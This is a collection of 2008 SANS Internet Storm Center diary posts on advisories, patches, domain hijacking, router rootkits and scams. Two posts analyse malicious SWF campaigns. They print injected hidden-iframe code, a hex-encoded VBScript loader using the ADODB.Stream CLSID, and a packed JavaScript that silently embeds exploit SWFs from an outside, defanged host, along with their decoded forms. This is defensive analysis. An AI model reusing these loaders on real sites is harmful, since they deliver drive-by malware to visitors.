Published: 2008-05-31

Microsoft Security advisory for Safari and Windows

The Microsoft Security Response Center (MSRC) has posted an entry to alert people of a security issue (advisory 953818) for users using Safari on the Windows platforms.  As many of you know Apple distributed the Safari browser to Windows users, first as an “update” and later as new software, but still defaulted to install.  So it was really only a matter of time before something nasty would take advantage of it.

The way I read it, the blended threat takes advantage of something Safari asks Windows to do.  Currently the advice is “Customers who have changed the default location where Safari downloads content to the local drive are not affected by this blended threat.”  In other words if you are using Safari on Windows, change the default download location.

If you have details of this threat please contact us.

Update:  the issue may be related to http://www.oreillynet.com/onlamp/blog/2008/05/safari_carpet_bomb.html

Mark - Shearwater


Published: 2008-05-30

ISC Flyer is ready

The new ISC flyer is ready. Thanks everybody for their feedback. We got about 50 people sending suggestions about what to include. What you find in this version of a flyer is based on the most frequently requested features, with some consideration to space.

We offer the flyer as a PDF. In order to print it, you need legal size paper. However, we plan to include the flyer in our next SANSFIRE mailing. If you are interested to receive this flyer and currently do not receive any SANS mailings, make sure you are registered at the SANS portal (complete and correct mailing address is important of course).

To download the flyer: http://isc.sans.org/presentations/iscflyer.pdf

While I was working on this, I also added links to some other flyers/cheatsheets SANS offers for download. See http://isc.sans.org/presentations.

the ultimate goal is to setup a "make your own flyer" web-application. But this will take a while. Layout of the flyer is rather tricky as we try to squeeze as much content as possible into it.

Corrections / suggestions: Please use our contact page.

Johannes Ullrich


Published: 2008-05-30

Where did my domain go?

This is a question you don’t want to be asking yourself looking at where your main web page should be.   Steve L, wrote in yesterday and mentioned that the Comcast network web site at Comcast.net looked like it was under construction.  I wrote it off as website maintenance (sorry Steve).  I guess it was a little bit more than that (in my defence it was an under construction notice, which some people put up when performing maintenance on their site).  That changed a little later on in the evening.   

Comcast had their domain snaffled away from them.   The account Comcast uses with Network Solutions was used to alter the records and redirect the site.  It won’t be the last time this happens.  People have reported Phishing increased attempts to gain access to registrar accounts.   The registrar I use is actively training its clients to click links in the numerous emails they send promoting stuff, probably not one of their better ideas and I doubt they are on their own in this practice.

There is money to be made in domain names.  We all understand the value of branding and getting the right name can help launch a product, company or people.   Registrars earn their living by providing as many names as possible, the process therefore has to be easy and flexible, hence the click here in emails.  Now hands up who can actually remember the userid and password they use for their registrar?  (ps feel free to mail them in   ).  Pretty much every time I need to do something with the registrar I have to request the password or, depending on the registrar, you can fax a request, on letterhead, through to them for action.  In a past life when we needed access to the client’s domain information, we would typically just fax through a request to the registrar on letterhead (yes with permission).  About 30 minutes later we’d have access to the domain.  I’m not saying it is still as easy, but.....

Which brings me to a friend of mine (no sniggering Mike), his mate had his domain name taken from him.  It came up for registration and due to timezones, he paid late.  Turns out someone was watching the domain and snapped it up as soon as it expired.  Two years of building a brand, gone in a few minutes.  He could get it back for a bargain, USD$10,000.   In another case the email address associated with the registrar account was changed (letterhead request), then a simple password reset and a transfer, voila one domain name gone.   If you spend some time on certain sites, you soon see that there are groups dedicated to grabbing desirable domain names, especially those that have established sites.  Of course the SPAM and malware delivery side of the business does equally well.

The moral of the story, protecting something as seemingly trivial as the userid and password of the account used to manage your domain names can make or break a business.  Luckily some registrars play ball and help out in these situations, but around the globe there are certainly some challenges.

Mark H - Shearwater


Published: 2008-05-29

Creative Software AutoUpdate Engine ActiveX stack buffer overflow

Reader Mark wrote in with a bit of intel about a Stack Based Buffer Overflow for Creative Software's AutoUpdate Engine through ActiveX.

Thanks to Mark and eEye who provided the vulnerability information here.

CLSID (Killbit) for this one is: 0A5FD7C5-A45C-49FC-ADB5-9952547D5715


For more information than you can stand about Killbits and how to set them check out a Google search of our own site.





Joel Esler



Published: 2008-05-29

Apple Update 10.5.3 and Apple Security Update 2008-003

Apple released a huge update today in 10.5.3, however, I'm only going to highlight the Security Portion of the update, 2008-003.  Some of these are purely Apple updates, some are simply updates to the Open Source packages that Apple provides in it's Operating System.

Updates to the following modules were made:

AFP Server -- Files that are not designated for sharing may be accessed remotely.

Apache -- Multiple vulnerabilities in Apache 2.0.55, including cross-site scripting.  Apache is updated to version 2.0.63 to address several vulnerabilities.

AppKit -- Maliciously crafted file, unexpected application termination, arbitrary code execution.

Apple Pixlet Video -- Vulnerability to unexpected application termination, arbitrary code execution.

ATS -- Vulnerability to arbitrary code execution

CFNetwork -- Vulnerability leading to disclosure of sensitive information

CoreFoundation -- Vulnerability leading to unexpected application termination or arbitrary code execution.

CoreGraphics -- Vulnerability that may lead to an unexpected application termination or arbitrary code execution.

CoreTypes -- Lack of prompting against opening "certain potentially unsafe content types" in Automator, Help, Safari, and Terminal.

CUPS -- Information disclosure.

Flash Player Plug-in -- Arbitrary code execution, Updating to version

Help Viewer -- Vulnerability to application termination or arbitrary code execution.

iCal -- Vulnerability to unexpected application termination or arbitrary code execution.

International Components for Unicode -- Disclosure of sensitive information.

Image Capture -- Path traversal vulnerability.

ImageIO -- Out-of-bounds memory read leading to information disclosure, Multiple vulnerabilities in libpng version 1.2.18, and Vulnerability to unexpected application termination or arbitrary code execution.

Kernel -- Remote vulnerability to unexpected system shutdown due to undetected failure condition and Local user vulnerability to unexpected system shutdown due to mishandling of code signatures.

LoginWindow -- Race condition preventing MCX preferences being applied

Mail -- IPv6 vulnerability leading to unexpected application termination, information disclosure, or arbitrary code execution.

ruby -- Remote vulnerability,  updated to version 1.1.4

Single Sign-On -- Password disclosure in sso_util

Wiki Server -- Remote vulnerability to information disclosure


Happy patching all!  I've upgraded three systems here, and I've had no problems that I can tell so far.


Joel Esler



Published: 2008-05-28

Reminder: Proper use of DShield data

Once in a while, we receive requests to remove an IP from our "blocklist", only to find out that the particular IP address isn't in our blocklist. Usually, it turns out that someone is using part of our DShield list in a way they are not supposed to be used.

DShield currently only publishes one blocklist: http://www.dshield.org/block.txt . It removes some of the obvious false positives. Of course, like with any block list, you should still use it at your own risk.

In addition, we are publishing the "Highly Predictive Blocklists" (http://www.dshield.org/hpbinfo.html). These blocklists are currently experimental, and a new version of the software should actually be release shortly.

Finally, there are a number of other "lists". For example, the following list is quite popular:


Note the big disclaimer at the top of this list:

# ipsascii.html

This list contains the top IPs, without any consideration to false positives.

Why don't we filter false positives?

Well, if it would be easy, we would do it. But first of all, DShield is a research tool. It has to provide consistent and complete data. In a particular case that came up today, a site was under DDoS attack. Our sensors picked up back scatter traffic and reported it to us. As a result, the site ended up in 'ipsascii.html'. I rather keep this type of activity in my database. Measuring backscatter is one thing we can do with our data. Another common false positive is P2P afterglow. But in case there is active scanning for P2P networks, we need to know what this afterglow looks like in order to substract it.

So again! stick to the recommended block lists. If you find an IP in our blocklist that shouldn't be there, let us know and we will remove it ASAP. But any raw data associated with the IP address will remain in our database. Finding an IP address in our database doesn't mean automatically that they are an "attacker" or "evil". To figure out what is happening, we need to look at the data in more detail.


Published: 2008-05-28

So, how do you monitor your website?

With all the talk of SQL injections and XSS and such, and all of these malicious SWFs, I was conversing with one of our readers, Steve, today and figured I'd ask the rest of you for some advice.  Steve has a script that he uses to monitor his website for malicious content, but I was wondering, beyond the obvious of using Tripwire, AIDE, Samhain, Osiris, etc., what do you use to monitor your own websites?  Let us know via the contact page, and we'll summarize the results this weekend.


Published: 2008-05-28

Another example of malicious SWF

Jerry wrote in to tell us of a new variant on the theme of SWF files
being found in the wild. This ones uses encoded VBScript to deliver.
A google search for www.chliyi.com gives us over 5,000 hits! The likely
method of getting the malcious scripts on these web servers is SQL
injection, check your code regularly.

So, let's take a look at this one:


Which contains:

if (navigator.systemLanguage=='zh-cn')
document.writeln("<iframe src=hxxp://www.chliyi.com/img/info.htm
width=0 height=0></iframe>");

Downloading hxxp://www.chliyi.com/img/info.htm gives us the following:

<Script Language="VBScript">
Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans)
Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr &
Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" &
Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)
<script language="javascript"

This decodes using hex to string:

<Script Language=VBScript>
        On Error Resume Next
        Set Ob = Document.CreateElement("object")
        Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
        Set Pop = Ob.Createobject("Adodb.Stream","")
        If Not Err.Number = 0 then
                Document.write ("<embed src=\"flash.swf\"></embed>")
                Document.write ("<iFrame sRc=real.htm width=0 height=0></ifrAmE>
                Document.write ("<iFrame sRc=new.htm width=0 height=0></ifrAmE>"
                Document.write ("<iFrame sRc=help.htm width=0 height=0></ifrAmE>
        End If

Lets get  hxxp://www.chliyi.com/img/flash.swf
Which gives us:

file flash.swf
flash.swf: Macromedia Flash data, version 9

swfdump flash.swf
[HEADER]        File version: 9
[HEADER]        File size: 858
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 771
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[006]       336 DEFINEBITS defines id 0682
==== Error: Unknown tag:0x056 ====
[056]        40 (null)
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
==== Error: Unknown tag:0x056 ====
[056]        12 (null)
==== Error: Unknown tag:0x052 ====
[052]       383 (null)
==== Error: Unknown tag:0x04c ====
[04c]        25 (null)
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Which looks familiar to us now.
real.htm, new.htm, help.htm are also quite interesting.

strings flash.swf shows us another possible malware location:
FWS     Z
flash.display   MovieClip

I munged the name of the file to pass language filters.
When I checked jj120.com resolved to and didn't
want to give me the file.

Thanks again Bojan and Jeremy!

Adrien de Beaupré
Bell Canada, Professional Services


Published: 2008-05-28

Followup to Flash/swf stories

We've received quite a bit of mail about our stories yesterday about the malicious SWF files attempting to exploit older versions of the Adobe Flash player.  So, here are a few of the things that have come out of our discussions.

  1. Our friends over at shadowserver.org (thanx, Steven) have a nice writeup that includes a bunch of domains they've noted that have the malicious SWF files.
  2. If you aren't sure which version of the flash player you are using, Adobe provides this page where you can check for yourself.
  3. On closer examination, this does not appear to be a "0-day exploit".  Symantec has updated their threatcon info, as well.
  4. It appears that this exploit may be included in the Chinese version of the MPack exploit toolkit (among others).
  5. In case we weren't clear about it earlier, it appears that the infected web sites check which browser you are using in addition to the flash player version to determine which exploit to deliver.

There are several ways to protect yourself even if you have a vulnerable version of the Flash player.

  • In Firefox, you can use either of the following add-ons, NoScript (one of our favorites, found here or here) or FlashBlock (here or here).
  • In IE, see here for how to set the "killbit", the CLSID is BD96C556-65A3-11D0-983A-00C04FC29E36.


Published: 2008-05-28

Podcast Episode Five has been released

Morning everyone,

Just a quick note to let everyone know that we put out Podcast Episode 5 this morning.  We had a special guest with us!  Larry Pesce of PaulDotCom Security Weekly!  The guys over at PaulDotCom do a great job, and we loved having Larry on the show!  Congradulations to Paul, as he is home with a new baby!

Don't forget the Live Podcast that we are doing at SANSFIRE on July 23rd at 8pm.

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.



Joel Esler



Published: 2008-05-27

Malicious swf files?

Marco and Eric wrote in to let us know of a potentially malicious site found at


The JPG file is actually a script, shown below:

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r
A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="
6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',62,73,'||document|write||expires|http|name|param|com|value|

Using spidermonkey, it decodes to:

if(document.cookie.indexOf("playon=")==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);
if(navigator.userAgent.toLowerCase().indexOf("msie")>0){document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0"
width="0" height="0" align="middle">');document.write('<param name="allowScriptAccess" value="sameDomain"/>');document.write('<param name="movie" value="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
("<EMBED src=hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/08.swf width=0 height=0>")}}

Lets get the swf files and see what they do, wget works.
file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9

Virustotal shows 0/32 for both files.

Swftools can show us what the swf files do:
swfdump -D 08.swf
[HEADER]        File version: 9
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 208 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c00c]       138 DOACTION
                 (   99 bytes) action: Constantpool(5 entries)
String:"flashVersion" String:"/:$version"
String:"ff.swf" String:"_root"
                 (    4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: DefineLocal
                 (    4 bytes) action: Push Lookup:2
Lookup:0 ("flashVersion")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:3 ("ff.swf")
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:4 ("_root")
                 (    0 bytes) action: GetVariable
                 (    1 bytes) action: GetUrl2 64
                 (    0 bytes) action: Stop
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Running the swf files in a web browser gives me the following URLs:
Both of which got me a big fat 404.
Either the final files have been removed, or are looking for a different version of the player.

Thanks to Bojan and Jeremy for their help!

Unknown at this time if these SWF files are related to this vulnerability.

Adrien de Beaupre
Bell Canada


Published: 2008-05-27

Adobe flash player vuln

A vulnerability has been reported in Adobe Flash Player versions and older, which is the current version available for download now. Adobe has not yet released a patch nor an official advisory. Stay tuned for further developments.

Update1: Symantec has observed that this issue is being actively exploited in the wild and have elevated their ThreatCon.

Update2: A SecurityFocus article is now live here.

Adrien de Beaupré
Bell Canada


Published: 2008-05-27

Suggestions wanted for ISC

For the last few years, we hand out an "ISC Flyer" / "Cheat sheet" at SANS conferences. It currently includes things like a port list, various NOC/abuse desk contact info and such. However, the flyer is very out of date. So my question to you all:

What would you like to see on a flyer like that? What would you find useful enough to hang on your cubicle wall?

We got a legal size sheet of paper that will be folded three-ways and can be printed on both sides. Font size can be on the small side. The result will be downloadable as PDF.

Please use our contact page to submit your ideas.


Published: 2008-05-26

Port 1533 on the Rise

Take a look at port 1533.  That's quite an increase in targeted computers reporting via DShield over the past few days.  Anybody got some good packet captures showing what is going on?  If so, send them to us via our contact page so we can analyze them. 

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-05-26

Predictable Response

Incident handling and management calls for developing well understood and predictable responses to emergencies or damaging events as they occur.  Frequent rehearsal of the response steps makes recovery from an incident faster and usually more successful.    But predictive behavior can also be used against us, if an adversary knows (or can predict) what you will do when faced with a series of unfolding events.

Some examples from the recent past include Y2K, the various terrorist attacks this decade, and natural disasters like Hurricane Katrina, the Indonesian tsunami, and the recent earthquakes in China.  With Y2K, do you remember the wild panic of trying to find Cobol programmers at the last minute who could fix the two-digit date fields?  Predictably, a lot of that programming got contracted to outside organizations - a well-trained adversary could have established multiple software companies that could have been used to insert malicious backdoors and booby traps into mainframes, control networks, and other critical computer systems.  In the days following Hurricane Katrina's landfall, we predictably saw over a thousand websites get established that offered a mechanism for getting donations to the affected families.  All they needed was your credit card number.  Yeah, right.

Most readers of the SANS Internet Storm Center's diaries know that we've followed nearly all of these events and sometimes we even predicted a few of them ourselves.  So now it's time to go out on a limb again.  Everybody is aware of the rapid rise in oil futures (the cost per barrel for crude oil), and if you drive a car you feel the result every time you fill up.  This morning I saw that the local station near my house had crossed the $4 per gallon threshold overnight.  I know that in Europe and Asia, $4 per gallon (that's about 0.67 Euros/Liter) is VERY cheap but it's about twice what we were paying for it this time last year.  If gas prices continue to climb at the current rate, they could well double by the end of the year.  So, here's the predictable behavior.  With gas prices that high, many people will prefer to work from home rather than driving or taking public transportation, thus putting a heavy load on ISPs and the Internet in general due to telecommuting.  So, if you were a Bad Guy, how would you take advantage of this predictable behavior? 

Some ideas some to mind, such as establishing web portals for work collaboration or marketing a new anti-virus solution for protecting home computers used for doing office work.  Either of those capabilities would of course include a "value added feature" designed to syphon off sensitive information for criminal or espionage purposes.  I'm sure there are many more evil ideas, so if you have any send them this way and we'll add them to the bottom of this diary.

UPDATE 1 - Here are a few ideas submitted by readers.  Feel free to use the "comment" capability or to send us your ideas via our contact page.  Either is fine.

Boris offered these thoughts:

If I was a bad guy and I wanted to take advantage of then increasing number of people working from home, I would increase the amount of key-logging and screen capture software that I was sending out.

Not only would this allow me to gain even deeper access into the compromised local machine through passwords but it would also allow me a unrestricted form of entry into the company's servers and data centres since I would have appropriate passwords and no brute force hacking required.

Screen capture software would also allow me to gain access to all kinds of sensitive documents and network plans, all useful for deeper attacks against the main servers of the company.

A reader wanting to remain anonymous said: 

There is already no shortage of people who will nav to a URL that they saw on *TV* in order to rid their computer of performance robbing mal-crap, without a single thought as to who's "free" scripted ActiveX is being driven down upon them as auto-magical quicksilver. 

Just who vouches for the ongoing security and iron clad compartmentalization of GoToMyPC and its ilk?  I could care less that Citrix is the backend and/or even a financial stake holder.  Citrix, in and of itself, is not hack proof.  Yet there are plenty of companies whose employees are already using G2MPC, whether or not the company actually knows about it and has officially sanctioned such whiz-bangy remote access "convenience." 

How many telecommute/work-from-home computers are going to be restricted only for official business use and quarantined from any/all personal use shenanigans??? 

Major corporations, who are already actively working on pandemic flu business continuity contingencies, may already have a vouched for infrastructure in place, that can sanely deal with any gas price related up tick in telecommuting/work-from-home.  How far these measures happen to trickle down to critical suppliers and business partners, who knows???   

Iain wrote to say: 

Here in the UK, GoToMyPC has recently been advertised on TV as a solution to accessing your office PC when at a remote meeting/presentation. Your suggested scenario of more home-working could also be driving this (unusual for the UK) advertising.

As a Sysadmin at a SMB, I use variations of VNC (specifically TightVNC) extensively within out network for support purposes. When working from home, I have to use a VPN to get past the firewall before using VNC to access specific machines. A free version of VNC that can connect 2 machines behind different firewalls (in a similar way to Windows Remote Support) would be useful to me. It would probably be usefule to someone planning to work from home as well. Since VNC is open-source, it would be relatively easy for a malicious company to produce such a version containing monitoring components, then advertise it as a free alternative to GoToMyPC.

VPNs are another target. My company network hides behind an Exoserver (proprietary FreeBSD firewall device) and a Smoothwall (Linux firewall device). Both of these devices provide VPN solutions allowing me to connect to the company network from home. Smaller business may have nothing more complex than a firewall/router connected to ADSL with no VPN capability. A relatively cheap router could be flashed with new software to provide simple VPN capability, with a side order of backdoor and information siphoning, then marketed as a simple connection solution.

This scenario is DEFINITELY possible. I have signed up to a project from Samknows.com to independently monitor UK ADSL ISPs. They provide a Linksys WRT54 variant with custom software that constantly monitors and tests my home ADSL connection. It sits between my ISPs router and the rest of my home network, so it has access to everything that happens on my ADSL connection. I had to decide whether I trusted these people - in the end, participating in this trial is a way to give something back to the community - just like writing this response.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-05-25

Cisco's Response to Rootkit presentation

Although I'm still waiting to see a copy of the presentation online, CISCO evidently have and they have posted a response.

You can see Mike Poor's evaluation of the issue here, and then jump straight across to CISCO's quite lengthy response on their site. CISCO have in fact produced what could become the enterprise de-facto process for good practice when deploying hardware and firmware. I can certainly see it being used by some internal auditors to keep us on our toes.





Published: 2008-05-23

Cisco IOS Rootkit thoughts

Sebastian Muniz of Core Security was due to give his talk on Cisco IOS Rootkits at EUsecwest today.  After reading the interview with Sebastian Muniz by Sean Comeau  I began thinking of the implications to enterprise operations.

While most enterprises have come to distrust the OS and applications, most still implicitly trust devices.  Whether the device is a printer, a wireless access point, or a router, most operations teams do little beyond applying patches to vulnerable systems.  Most security teams avoid the clash with the operations teams over testing and hardening network devices.

In the case of the printers, we have seen many printer compromises over the years.  I first ran into one almost ten years ago.  These were old office document printers running AIX... you know the ones.  Since that event, I have handled on average 3 investigations a year where a core printer is involved in the theft of corporate data. 

Most organizations treat these devices as unmanaged machines leased from a 3rd party vendor.  The vendor barely supports the device beyond providing paper and toner.  Many of these printers have POTS capability (remote admin, status, as well as fax), network functionality, and wireless.  HP offers a lockdown guide and configuration tool to lockdown their printers.  Here's a link:


If anyone doubts the capabilities of a simple access point, one only needs to go so far as checking in with Paul Asadoorian and Larry Pesce (of pauldotcom.com fame).  Their awesome book http://www.amazon.com/Linksys-WRT54G-Ultimate-Hacking-Asadoorian/dp/1597491667  (shameless plug) and SANS course ( SANS Security 535: Network Security Projects Using Hacked Wireless Routers )  provide much depth and coverage on the topic.

Now, on to the more sensitive topic... hacking IOS.  We can all remember just a few years ago when the Mike Lynn debacle occured at Black Hat when he was scheduled to present on IOS hacking.  Lawyers got involved, goons ripped pages out of conference giveaways, etc.  A couple thoughts come to mind when dealing with the potential of a hacked router:

1. How to validate the IOS running on the device.  Obviously, it can lie just as a kernel level root kit can lie.  My preference might be a steady routine of flashing the device, although that would go against most organizations notions of uptime (and Im usually ok with that).  I do like that Muniz points to CIR as a remedy in this case:

<From the article>

Sean Comeau: Are there any existing tools to detect unauthorized modification
of IOS?

Sebastian Muniz: Yes, CIR "Cisco Information Retrieval" created by FX is THE
TOOL in this case. It's a framework capable of detecting those kind of
modifications. This tool analyzes crash dumps by performing several tests to
it and taking a clean IOS image as a starting point. This is a great tool and
probably the only one able to do this but it relies in the IOS functions that
generate the crash dump so, if those functions are hooked by the rootkit, the
result may not be correct. The thing is not that easy because CIR is able to
perform several tests and could detect the rootkit but this will probably be
like a race, competing with each other to see who has the latest trick to
bother it's counterpart. But in the case of the version of rootkit (DIK) that
will be presented at the conference, CIR will be able to detect it.
</From the article>

2. Router lockdown. 

Cisco has its Security Device Manager (SDM) http://www.cisco.com/go/sdm  with a good article on it here: http://www.cisco.com/en/US/prod/collateral/routers/ps5318/product_data_sheet0900aecd800fd118.html

The Center for Internet Security (CIS) has a Router Assessment Tool (RAT) that can be used on Windows or Unix-like operating systems to assess the security of a Cisco Router.  This tool can be found here:


Given the amount of interesting things to think about and do presented here... its great that its Memorial Day weekend in the U.S.A.  Have  a great weekend, think of those that have given their lives so that we can enjoy ours...

Mike Poor, Handler on Duty

Intelguardians, Inc.


Published: 2008-05-23

Wiping your mobile devices

Some recent emails to the Storm Center have further focused our attention on the need to wipe your mobile devices if you intend to sell/donate/pass them along.  I have a large box of mobile phones that I have done nothing with as I dont feel confident in the manufacturers suggestions for wiping data.  Many of them just involve resetting settings back to default, which in most cases just leaves all your information in memory.

My recommendation would have to be to do a complete wipe of the device, then reflash the system.  In most cases though, this is easier said than done.  For example, one recent post  (Rich Mogul from Securosis http://securosis.com/2008/05/20/formatting-an-iphone-to-wipe-data/) suggested reflashing the iphone, then un-checking the sync functionality for contacts, calendar etc.  Following this, fill the iphone with music and sync three times.  Then reflash to default, and sell your "clean" iphone.

I would prefer to do a bit by bit wipe of devices if I were to part with them ...

<comment> you can have my iphone when you pry it from my cold dead hands </comment>   :-)

I would be interested in hearing peoples stories/tips for wiping mobile devices and or performing forensics on mobile devices.  

Here are some links to Forensics hardware and software.

Links to articles on wiping iPhone and Blackberry:


Mike Poor, H.O.D.

Intelguardians, Inc




Published: 2008-05-22

From the mailbag

I don't want to jinx the next handler (well, I do but what comes around goes around) so without saying the 's' word or the 'q' word let me just say we are thankfully less than fully utilized and offer a few tidbits from the mailbag.

One reader sent a link to an article regarding various computer security laws and how you may be breaking them without knowing.  I'm not a lawyer, I don't play one on TV and I didn't spend last night in a hotel room so make sure you check with your legal department when considering action based on anything in that article.




Published: 2008-05-21

Three Cisco advisories released today

Cisco has released three advisories this week, two that cover DOS vulnerabilities in IOS SSH and the Secure Control Engine (SCE) and one privilege escalation in Cisco Voice Portal (CVP).

While the "Exploitation and Public Announcements" portion of all three advisories states that the vulns were discovered in-house, it's a pretty safe bet that a fair number of security "researchers" are feverishly reverse engineering the updates to develop exploits for private use and/or public release.

Anytime we see a "spurious memory access" leading to a denial of service, thoughts immediately go to arbitrary code execution.  There is no evidence that this is possible, but in light of the recent work in IOS rootkits, vulns in Cisco devices should not be taken lightly.  Sebastian Muniz of CORE Security is scheduled to release a proof of concept Cisco IOS rootkit tomorrow at EuSecWest.  Stand by for more details.

Read 'em and update:

Cisco IOS Secure Shell Denial of Service Vulnerabilities

Cisco Service Control Engine Denial of Service Vulnerabilities

Cisco Voice Portal Privilege Escalation Vulnerability



Published: 2008-05-20

Java 6 Update 6 has been released

Sun has released Java 6 Update 6 including 13 bug fixes. At first glance going through the Release Notes, only one of them seems to be security related, but as always, it is recommended to update to the latest version (after appropriate testing).

You can check your current Java version here.

The update is still in the process of showing up through the standard Sun update mechanism. I have tested and run "C:\Program Files\Java\jre1.6.0_05\bin\jucheck.exe" and still says I have the latest Java version.

IMPORTANT: Remeber, as always, to manually uninstall any previous Java versions.

Raul Siles



Published: 2008-05-20

Podcast Episode Four has been released

Morning everyone,

Just a quick note to let everyone know that we put out Podcast Episode 4 this morning.  Just a few announcements at the beginning, and then I put the audio for May's Monthly "Reboot Wednesday" Podcast that we do through SANS on after that.  We'll be recording Episode five next week.  We'll let you know when it's out!

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.



Joel Esler



Published: 2008-05-20

List of malicious domains inserted through SQL injection

One of the main attack vectors we have seen during the last years are "silent" Web defacements, typically in the form of redirections to malicious JavaScript code that are inserted inside the contents of Web pages using iframes, images, or other HTML tags. As lots of Web servers get their contents (or part of them) directly from a database, SQL injection vulnerabilities are widely exploited to insert the malicious references. You can find some of the previous related ISC diary entries here (by using Google).

Unfortunately, there is no silver bullet method to identify if a Web site (Web server or database) has been infected with new HTML tags, due to the fact that complex Web environments typically contain hundreds of scripts, redirections and references. One way of checking if a Web site is vulnerable and has been compromised is by searching for the specific malicious domains hosting the JavaScript and pointed out by the inserted references. We always try to emphasize these malicious domains in the diary entries so that you can search for or even block them.

Mike Johnson from Shadowserver has published a list of domains used in past and recent massive SQL injections that insert malicious javascript into websites. The list is just focused on mass SQL injection attacks, and do not replace other  generic malware lists such as www.malwaredomainlist.com or malwaredomains.com. Mike's plans to maintain this list as we come across new domains over time. The list also contains an estimated number of current number of infected Web sites based on Google stats. This is a great initiative and a very useful resource, and I encourage you to check if you can find references to any of these domains in:

  • Your Web server contents (static contents and database), meaning the server has been compromissed and you need to clean it up and fix the vulnerability originally used by the attackers to insert the redirection tags.
  • Your network traffic, meaning your clients are accessing compromissed Web servers and are being redirected to the malicious domains. These domains are typically trying to exploit client-based vulnerable software, so if your clients are not throughly updated, there is a higher chance that some of them have being compromised.

If you know about any other similar resource, or additional domains hosting (or that have hosted in the past) malicious code used in SQL injection attacks, please contact us.

Raul Siles


Published: 2008-05-19

Route filtering and its impact on the DNS fabric

Information Security consultants regularly work with their clients to identify their "critical infrastructure": those assets which are needed to keep the organization running at an acceptable level. On such engagements, after the employees have listed and described their own assets, I tend to ask them "... and what about Google?". A lot of companies really need a good search engine ranking for their clients to find them. Something which can and has been attacked. It is however often not quite clear whose responsibility it is to monitor components such as these: information security or marketing?

There are several other components which make up the internet fabric that help users get where they need to be. Today, the people at Renesys posted a fascinating blog entry showing what could go wrong at a completely different level: DNS. They identify how the hijacking of IP space can pose a valid risk to the reliability of the internet as a business medium. While malicious intent can't be proven, this is exactly what appears to have affected L.root-servers.net in the recent history.

This is no reason to panic - it is however an indication of just one of many things the information security community needs to be aware of. Short lived BGP announcements have commonly been used to distribute spam, and inadvertent mistakes have brought down major web sites. Renesys' posting is an example of how a lack of route filtering can have even deeper, but less visible consequences.

Read their blog entry on the adventures of L.root-servers.net here.


Published: 2008-05-19

Text message and telephone aid scams

Jim recently wrote a diary on the various scams related to Myanmar's cyclone and the Sichuan earthquake.

Usually, these scams take place by means of web sites which accept funds through Paypal or sometimes even wire transfers. However, as with all types of unsollicited messages, these were bound to move to other media as well.

Earlier today we received interesting reports from China of text messages (SMS) being distributed which request the reader to transfer money to a certain account number, or even just reply to the message to help fund relief to the Sichuan earthqake. In addition, late last week reports appeared of a message which invited readers to help the Red Cross fight "poverty and suffering" by making a call, or sending a text message.

While one would expect more physical acts, such as sending text messages or calling a number allow better identification of the culprits than more obscure credit card number theft and distribution,  this is often not the case. While the owner of a number may easily be identified in many cases, it is often just the company providing a service for another third party. The latter may have used fake For-a-fee telephone numbers, both for call and SMS are often purchased through service providers, which may require less stringent verification of their clients than the actual phone network.


Published: 2008-05-18

A Mileage Report from BlueHat

